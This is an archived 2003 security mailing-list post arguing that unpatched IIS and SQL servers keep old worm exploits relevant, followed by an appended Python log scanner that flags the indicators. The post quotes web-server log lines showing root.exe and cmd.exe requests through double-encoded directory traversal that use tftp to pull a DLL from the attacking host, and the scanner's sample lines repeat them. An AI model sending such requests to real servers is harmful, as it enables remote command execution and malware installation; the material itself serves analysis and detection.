From: Aj Effin Reznor (aj_at_reznor.com)
Date: Sat Jan 25 2003 - 17:01:27 CST


    "Mark Litchfield was known to say....."

    > Not to miss the wagon:
    >
    > Based on the fact that it affects SQL servers, and interestingly enough 6
    > months to the day, that remain unpatched, and would have been protected,
    > before everyone goes and starts to blame MS, I've scraped the barrel to
    > produce the following,

    The "wagon" in this case seems to be driven and ridden by a ton of admins
    that don't patch, don't pay attention, and don't keep up on things.

    Face it, the "ease of use" of MS OS's leads to "ease of neglect" also.
    Servers used to be optimized. Admins studied their usage levels of drive space,
    memory usage, avg. CPU consumption over 24 hour periods, baselined these
    averages and at set intervals rechecked them for comparisons.

    Now, we have an easy to use GUI where you go to "Properties" and find the
    little slider marked "Performance", or perhaps a dropdown box, to tweak
    your server to run better. And somehow you suspect that these point and
    click admins are going to be 100% on top of patching their servers?

    Your rationale is that a 6 month old exploit doesn't need the re-investigation,
    esp. once a worm affecting it comes out.

    Here, take a look-see at this:

    63.150.78.XXX - - [22/Jan/2003:05:35:11 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 360 "-" "-"
    63.150.78.XXX - - [22/Jan/2003:05:35:32 -0800] "GET /scripts/root.exe?/c+tftp%20-i%2063.150.78.XXX%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 414 "-" "-"
    63.150.78.XXX - - [22/Jan/2003:05:35:54 -0800] "GET /scripts/httpodbc.dll HTTP/1.0" 404 9807 "-" "-"
    63.150.78.XXX - - [22/Jan/2003:05:35:54 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 358 "-" "-"

    <snip 56 entries in between>

    63.150.78.XXX - - [22/Jan/2003:05:52:04 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.150.78.XXX%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 441 "-" "-"
    63.150.78.XXX - - [22/Jan/2003:05:52:23 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.150.78.XXX%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 441 "-" "-"
    63.150.78.XXX - - [22/Jan/2003:05:52:42 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.150.78.XXX%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 441 "-" "-"
    63.150.78.XXX - - [22/Jan/2003:05:53:01 -0800] "GET /scripts/..%252f../httpodbc.dll HTTP/1.0" 200 367 "-" "-"

    Mein Gott! What's this? Attack signatures from a worm that's HOW old? I
    mean, my eyes, Apache, both must be deceiving me, right? That's old news, all
    admins MUST be patched against this!

    The hole that Code Red leveraged was Old News (TM) also, but had eEye not
    disassembled it, had no one, would whitehouse.gov have stood a chance?

    Sometimes, revisiting a hole and examining the proof-of-concept code that's in
    the wild and affecting major portions of the net *does* need to be looked at.
    Or, is ignorance truly bliss?

    -aj.
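A defender-side check for the pattern in the quoted log, added here as an example and not part of the original post: it parses Apache combined-format lines, percent-decodes repeatedly so the `..%252f..` double encoding is unwrapped before matching, and flags the root.exe, cmd.exe, tftp and httpodbc.dll indicators the entries above contain. The sample lines and the 192.0.2.10 / 198.51.100.7 addresses are constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Apache combined log format, the layout of the entries quoted in the post.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) \S+')

# Substrings characteristic of the worm traffic in the post (matched on the decoded URI).
INDICATORS = (("root.exe", "root.exe backdoor request"),
              ("cmd.exe", "cmd.exe reached via web root"),
              ("httpodbc.dll", "httpodbc.dll dropped or requested"),
              ("tftp", "tftp transfer embedded in request"))

def decode_layers(uri, max_rounds=4):
    """Percent-decode until stable; return (decoded, number of passes that changed it)."""
    layers = 0
    for _ in range(max_rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri, layers = decoded, layers + 1   # %252f -> %2f -> / takes two passes
    return uri, layers

def classify(line):
    """Parse one log line; return its fields plus a 'reasons' list, or None if unparseable."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    entry = m.groupdict()
    decoded, layers = decode_layers(entry["uri"])
    low = decoded.lower()
    reasons = [label for needle, label in INDICATORS if needle in low]
    if "/../" in low or "\\..\\" in low:
        reasons.append("directory traversal")
    if layers >= 2:
        reasons.append("double percent-encoding (filter evasion)")
    entry.update(decoded_uri=decoded, reasons=reasons)
    return entry

def flagged_by_source(lines):
    """Count flagged requests per source IP, so one host's sweep shows up as a unit."""
    return Counter(e["ip"] for e in map(classify, lines) if e and e["reasons"])

# Constructed sample lines (TEST-NET addresses), modelled on the post's entries.
SAMPLE = [
    '192.0.2.10 - - [22/Jan/2003:05:35:11 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 360 "-" "-"',
    '192.0.2.10 - - [22/Jan/2003:05:52:04 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20192.0.2.10%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 441 "-" "-"',
    '198.51.100.7 - - [22/Jan/2003:05:40:00 -0800] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]
```

On a real IIS host, a 200 on a root.exe request means the backdoor itself answered, so such hits warrant a host investigation rather than just a firewall rule.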